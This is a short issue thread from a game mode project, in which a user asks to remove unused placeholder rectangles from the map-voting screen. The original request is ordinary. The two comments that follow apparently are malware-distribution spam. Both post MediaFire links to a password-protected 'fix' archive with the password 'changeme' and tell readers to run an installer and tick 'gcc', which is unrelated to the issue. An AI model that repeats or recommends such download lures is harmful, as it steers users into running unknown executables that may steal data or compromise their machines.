### ISSUE TITLE
Remove unused rectangles from list of available maps

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#87]
**Why you would like to see this resolved, what does it enhance / bring to the table?**
The design would look better if the unused rectangles were removed.

**Additional context**
From my understanding, this was part of a feature that displayed the Steam profile pictures of the users who voted for the map. I don't know how deeply embedded it is or how close that feature is from being functional.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
